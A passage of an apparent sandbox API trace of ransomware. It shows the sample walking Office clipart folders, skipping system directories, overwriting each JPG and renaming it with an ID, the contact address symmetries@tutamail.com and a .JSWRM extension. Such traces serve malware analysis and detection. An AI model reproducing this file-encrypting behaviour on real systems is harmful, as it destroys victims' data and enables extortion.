RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0082.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0082.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0082.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0144773.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.873] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=40231) returned 1 [0082.873] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9d20) returned 0x24d210 [0082.874] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9d20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9d20, lpOverlapped=0x0) returned 1 [0082.916] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.916] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9d20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9d20, lpOverlapped=0x0) returned 1 [0082.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.917] CloseHandle (hObject=0x314) returned 1 [0082.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0082.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0082.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0082.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0082.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0082.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0082.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.918] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0144773.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0144773.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0144773.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0082.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0082.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0082.919] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8379, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0145168.JPG", cAlternateFileName="")) returned 1 [0082.919] lstrcmpiW (lpString1="J0145168.JPG", lpString2=".") returned 1 [0082.919] lstrcmpiW (lpString1="J0145168.JPG", lpString2="..") returned 1 [0082.919] lstrcmpiW (lpString1="J0145168.JPG", lpString2="...") returned 1 [0082.919] lstrcmpiW (lpString1="J0145168.JPG", lpString2="windows") returned -1 [0082.919] lstrcmpiW (lpString1="J0145168.JPG", lpString2="recovery") returned -1 [0082.919] lstrcmpiW (lpString1="J0145168.JPG", lpString2="perflogs") returned -1 [0082.919] lstrcmpiW (lpString1="J0145168.JPG", lpString2="documents and settings") returned 1 [0082.919] lstrcmpiW (lpString1="J0145168.JPG", lpString2="$RECYCLE.BIN") returned 1 [0082.919] lstrcmpiW (lpString1="J0145168.JPG", lpString2="system volume information") returned -1 [0082.919] lstrcmpiW (lpString1="J0145168.JPG", lpString2="msocache") returned -1 [0082.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0082.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145168.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145168.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145168.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0082.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0082.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145168.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145168.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145168.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0082.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0082.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0082.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.919] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.920] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33657) returned 1 [0082.920] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8370) returned 0x24d210 [0082.921] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8370, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8370, lpOverlapped=0x0) returned 1 [0082.925] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.925] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8370, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8370, lpOverlapped=0x0) returned 1 [0082.925] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.926] CloseHandle (hObject=0x314) returned 1 [0082.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0082.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0082.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0082.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0082.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0082.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0082.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.926] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0082.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0082.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.928] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf0c1, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0145212.JPG", cAlternateFileName="")) returned 1 [0082.928] lstrcmpiW (lpString1="J0145212.JPG", lpString2=".") returned 1 [0082.928] lstrcmpiW (lpString1="J0145212.JPG", lpString2="..") returned 1 [0082.928] lstrcmpiW (lpString1="J0145212.JPG", lpString2="...") returned 1 [0082.928] lstrcmpiW (lpString1="J0145212.JPG", lpString2="windows") returned -1 [0082.928] lstrcmpiW (lpString1="J0145212.JPG", lpString2="recovery") returned -1 [0082.928] lstrcmpiW (lpString1="J0145212.JPG", lpString2="perflogs") returned -1 [0082.928] lstrcmpiW (lpString1="J0145212.JPG", lpString2="documents and settings") returned 1 [0082.928] lstrcmpiW (lpString1="J0145212.JPG", lpString2="$RECYCLE.BIN") returned 1 [0082.928] lstrcmpiW (lpString1="J0145212.JPG", lpString2="system volume information") returned -1 [0082.928] lstrcmpiW (lpString1="J0145212.JPG", lpString2="msocache") returned -1 [0082.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145212.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145212.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145212.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0082.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145212.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145212.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145212.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0082.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0082.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0082.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0082.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.929] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=61633) returned 1 [0082.929] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0c0) returned 0x24d210 [0082.930] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xf0c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xf0c0, lpOverlapped=0x0) returned 1 [0082.935] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.935] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xf0c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xf0c0, lpOverlapped=0x0) returned 1 [0082.936] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.936] CloseHandle (hObject=0x314) returned 1 [0082.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0082.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0082.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0082.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0082.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0082.937] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0082.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0082.937] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0082.937] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145212.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145212.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0082.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0082.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0082.938] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc056, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0145272.JPG", cAlternateFileName="")) returned 1 [0082.938] lstrcmpiW (lpString1="J0145272.JPG", lpString2=".") returned 1 [0082.938] lstrcmpiW (lpString1="J0145272.JPG", lpString2="..") returned 1 [0082.938] lstrcmpiW (lpString1="J0145272.JPG", lpString2="...") returned 1 [0082.938] lstrcmpiW (lpString1="J0145272.JPG", lpString2="windows") returned -1 [0082.938] lstrcmpiW (lpString1="J0145272.JPG", lpString2="recovery") returned -1 [0082.938] lstrcmpiW (lpString1="J0145272.JPG", lpString2="perflogs") returned -1 [0082.938] lstrcmpiW (lpString1="J0145272.JPG", lpString2="documents and settings") returned 1 [0082.938] lstrcmpiW (lpString1="J0145272.JPG", lpString2="$RECYCLE.BIN") returned 1 [0082.938] lstrcmpiW (lpString1="J0145272.JPG", lpString2="system volume information") returned -1 [0082.938] lstrcmpiW (lpString1="J0145272.JPG", lpString2="msocache") returned -1 [0082.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0082.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145272.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145272.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145272.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0082.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0082.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145272.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0145272.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0145272.JPG", lpUsedDefaultChar=0x0) returned 12 [0082.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0082.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0082.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0082.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145272.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145272.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.939] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=49238) returned 1 [0082.939] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.939] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc050) returned 0x24d210 [0082.940] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xc050, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xc050, lpOverlapped=0x0) returned 1 [0082.945] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.945] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xc050, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xc050, lpOverlapped=0x0) 